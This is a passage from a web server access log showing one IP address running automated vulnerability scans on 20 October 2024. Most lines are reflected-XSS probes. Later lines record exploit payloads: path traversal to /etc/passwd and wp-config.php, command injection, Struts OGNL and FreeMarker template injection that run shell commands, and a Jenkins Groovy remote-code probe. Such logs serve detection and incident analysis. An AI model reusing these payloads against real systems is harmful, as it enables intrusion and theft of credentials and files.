%28%27xss-checkemail%27%29%3E&menu-locations=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-locations%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:51 +0000] GET /?name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-name%27%29%3E&json=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-json%27%29%3E&id_base=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id_base%27%29%3E&where=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-where%27%29%3E&request=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-request%27%29%3E¬es=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-notes%27%29%3E&img=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-img%27%29%3E&a=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-a%27%29%3E&menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-item%27%29%3E&xml=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-xml%27%29%3E&columns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-columns%27%29%3E&service=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-service%27%29%3E&site_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site_id%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:51 +0000] GET /?tags=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tags%27%29%3E&e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-e%27%29%3E&users=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-users%27%29%3E&format=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-format%27%29%3E&dl=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dl%27%29%3E&position=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-position%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-url%27%29%3E&theme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-theme%27%29%3E&firstname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-firstname%27%29%3E&fields=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fields%27%29%3E&form=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-form%27%29%3E&level=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-level%27%29%3E&month=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-month%27%29%3E&oauth_verifier=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_verifier%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:51 +0000] GET /?order_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order_id%27%29%3E&cookie=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cookie%27%29%3E&debug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-debug%27%29%3E&m=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-m%27%29%3E&dir=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dir%27%29%3E&new_role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new_role%27%29%3E&trashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trashed%27%29%3E&log=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-log%27%29%3E&excerpt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-excerpt%27%29%3E&settings-updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings-updated%27%29%3E&plugins=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugins%27%29%3E&modify=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-modify%27%29%3E&pwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pwd%27%29%3E&file=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:51 +0000] GET /?i=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-i%27%29%3E&database=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-database%27%29%3E&tax_input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax_input%27%29%3E&secret=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-secret%27%29%3E&mod=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mod%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-s%27%29%3E&stage=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stage%27%29%3E&time=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-time%27%29%3E&new=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-api_key%27%29%3E&invalid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-invalid%27%29%3E&db=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db%27%29%3E&upload=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-upload%27%29%3E&tablename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tablename%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:51 +0000] GET /?subject=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-subject%27%29%3E&sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sticky%27%29%3E&ns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ns%27%29%3E&history=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-history%27%29%3E&category_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category_id%27%29%3E&metakeyselect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyselect%27%29%3E©=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-copy%27%29%3E&product_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-product_id%27%29%3E&status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-status%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cat%27%29%3E&list=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-list%27%29%3E&val=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-val%27%29%3E&what=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-what%27%29%3E&group_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group_id%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:51 +0000] GET /?attachment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment%27%29%3E&dbname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dbname%27%29%3E&rows=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rows%27%29%3E&parent_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent_id%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lang%27%29%3E&fid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fid%27%29%3E&text=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text%27%29%3E&link=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link%27%29%3E&timeout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timeout%27%29%3E&db_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_name%27%29%3E&ids=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ids%27%29%3E&w=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-w%27%29%3E&provider=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-provider%27%29%3E&plugin_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin_status%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:51 +0000] GET /?sort=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sort%27%29%3E&msg=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-msg%27%29%3E&hostname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hostname%27%29%3E&directory=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-directory%27%29%3E&disabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-disabled%27%29%3E&last_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-last_name%27%29%3E&oauth_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_token%27%29%3E&first_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-first_name%27%29%3E&delete_widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete_widget%27%29%3E&md5=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-md5%27%29%3E&selection=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-selection%27%29%3E&filename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filename%27%29%3E&address=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-address%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:51 +0000] GET /?ajax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ajax%27%29%3E&timezone_string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone_string%27%29%3E&group=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group%27%29%3E&update=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-update%27%29%3E&revision=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-revision%27%29%3E&referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-referer%27%29%3E&index=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-index%27%29%3E&src=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-src%27%29%3E&end_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end_date%27%29%3E&gmt_offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gmt_offset%27%29%3E¶ms=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-params%27%29%3E&html=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-html%27%29%3E&pass=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass%27%29%3E&offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-offset%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:51 +0000] GET /?image=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-image%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id%27%29%3E&order=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order%27%29%3E&sid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sid%27%29%3E&language=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-language%27%29%3E&filter=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filter%27%29%3E&import=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-import%27%29%3E&st=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-st%27%29%3E&act=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-act%27%29%3E&object=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-object%27%29%3E&insert=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-insert%27%29%3E&task=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-task%27%29%3E&dismiss=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dismiss%27%29%3E&orderby=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-orderby%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:51 +0000] GET /?up=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-up%27%29%3E&body=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-body%27%29%3E&return=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-return%27%29%3E&end=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end%27%29%3E&n=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-n%27%29%3E&opt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-opt%27%29%3E&source=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-source%27%29%3E&y=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-y%27%29%3E&parent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent%27%29%3E&reason=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reason%27%29%3E&meta=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-meta%27%29%3E&pass1=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass1%27%29%3E&blog=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog%27%29%3E&plugin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:51 +0000] GET /?option=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-option%27%29%3E&server=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-server%27%29%3E&admin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin%27%29%3E&create=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-create%27%29%3E&template=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-template%27%29%3E&number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-number%27%29%3E&lastname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lastname%27%29%3E&multi_number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-multi_number%27%29%3E&size=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-size%27%29%3E&tax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax%27%29%3E&sql=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sql%27%29%3E&show_sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show_sticky%27%29%3E&attachments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachments%27%29%3E&_method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_method%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:51 +0000] GET /?taxonomy=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-taxonomy%27%29%3E&tables=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tables%27%29%3E&confirm=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-confirm%27%29%3E&db_port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_port%27%29%3E&op=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-op%27%29%3E&untrashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-untrashed%27%29%3E&tid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tid%27%29%3E&flag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-flag%27%29%3E&stylesheet=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stylesheet%27%29%3E&download=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-download%27%29%3E&comment_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_status%27%29%3E&_wpnonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wpnonce%27%29%3E&metakeyinput=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyinput%27%29%3E&remove=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-remove%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:51 +0000] GET /?deleted=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-deleted%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-search%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action%27%29%3E&newname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newname%27%29%3E&info=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-info%27%29%3E&content=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-content%27%29%3E&signature=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signature%27%29%3E&noconfirmation=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noconfirmation%27%29%3E&field=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field%27%29%3E&output=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-output%27%29%3E&city=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-city%27%29%3E&rename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rename%27%29%3E&mail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mail%27%29%3E&term=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-term%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:56 +0000] GET /?widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget%27%29%3E&height=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-height%27%29%3E&screen=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-screen%27%29%3E&pass2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass2%27%29%3E&redirect_to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect_to%27%29%3E&items=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-items%27%29%3E&string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-string%27%29%3E&hidden=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hidden%27%29%3E&f=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-f%27%29%3E&step=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-step%27%29%3E&role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-role%27%29%3E&preview_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_nonce%27%29%3E&date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-date%27%29%3E&event=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-event%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:56 +0000] GET /?num=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-num%27%29%3E&drop=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-drop%27%29%3E&g-recaptcha-response=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g-recaptcha-response%27%29%3E&field_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field_id%27%29%3E&user_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_email%27%29%3E&alias=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-alias%27%29%3E&ref=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ref%27%29%3E&save=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-save%27%29%3E&enabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enabled%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-year%27%29%3E&checked=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checked%27%29%3E&post_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_ID%27%29%3E&files=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-files%27%29%3E&text-color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text-color%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:56 +0000] GET /?admin_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_email%27%29%3E&code=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-code%27%29%3E&dump=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dump%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-item%27%29%3E&timezone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone%27%29%3E&blog_public=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog_public%27%29%3E&add=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-add%27%29%3E&enable=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enable%27%29%3E&customized=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-customized%27%29%3E&admin_password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_password%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keywords%27%29%3E×tamp=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timestamp%27%29%3E&label=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-label%27%29%3E&g=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:26:56 +0000] GET /?location=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-location%27%29%3E&link_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_url%27%29%3E&post_mime_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_mime_type%27%29%3E&uid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uid%27%29%3E&host=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-host%27%29%3E&cmd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cmd%27%29%3E&link_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_id%27%29%3E&reset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reset%27%29%3E&nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nonce%27%29%3E&username=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-username%27%29%3E&site=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site%27%29%3E&do=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-do%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-email%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:27:10 +0000] GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1 404 1207
195.164.49.69 - - [20/Oct/2024:17:27:12 +0000] GET /photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php. HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:17:27:13 +0000] GET /RestAPI/ImportTechnicians HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:17:27:14 +0000] GET /metrics HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:17:27:15 +0000] GET /api/metrics HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:17:27:16 +0000] GET /env HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:17:27:17 +0000] GET /actuator/env HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:17:27:18 +0000] GET /actuator;/env; HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:17:27:19 +0000] GET /message-api/actuator/env HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:17:27:20 +0000] GET /login/../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:17:27:20 +0000] GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:17:27:23 +0000] GET /openam/oauth2/..;/ccversion/Version HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:17:27:23 +0000] GET /cgi-bin/config.exp HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:17:27:25 +0000] GET /web.config.i18n.ashx?l=qhgis&v=qhgis HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:17:27:26 +0000] GET /SWNetPerfMon.db.i18n.ashx?l=qhgis&v=qhgis HTTP/1.1 404 1099
83.212.98.101 - - [20/Oct/2024:17:27:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:17:27:27 +0000] GET /s/2ni6kCtRD2ndRRVpds6Fy1RgHwq/_/;/WEB-INF/web.xml HTTP/1.1 404 1143
195.164.49.69 - - [20/Oct/2024:17:27:28 +0000] GET /premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:17:27:29 +0000] GET /catalog-portal/ui/oauth/verify?error&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:17:27:30 +0000] GET /zabbix/setup.php HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:17:27:31 +0000] GET /setup.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:17:27:32 +0000] GET /SetupWizard.aspx/pjftCcUacu HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:17:27:33 +0000] GET /passwordrecovered.cgi?id=7eHGS HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:17:27:34 +0000] GET /zabbix/index_sso.php HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:17:27:35 +0000] GET /index_sso.php HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:17:27:36 +0000] GET /module/api.php?mobile/webNasIPS HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:17:27:37 +0000] GET /mifs/aad/api/v2/admins/users HTTP/1.1 404 1122
195.164.49.69 - - [20/Oct/2024:17:27:38 +0000] GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1 404 1162
195.164.49.69 - - [20/Oct/2024:17:27:39 +0000] GET /core HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:17:27:40 +0000] GET /logfile HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:17:27:41 +0000] GET /actuator/logfile HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:17:27:42 +0000] GET /actuators/logfile HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:17:27:43 +0000] GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:17:27:44 +0000] GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:17:27:45 +0000] GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:17:27:46 +0000] GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:17:27:47 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:17:27:48 +0000] GET /threaddump HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:17:27:49 +0000] GET /actuator/threaddump HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:17:27:50 +0000] GET /?pretty HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:27:51 +0000] GET /_cat/indices?v HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:17:27:52 +0000] GET /_all/_search HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:17:27:53 +0000] GET /_cluster/health?pretty HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:17:27:54 +0000] GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:17:27:55 +0000] GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:17:27:56 +0000] GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:27:58 +0000] GET //CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1 404 1121
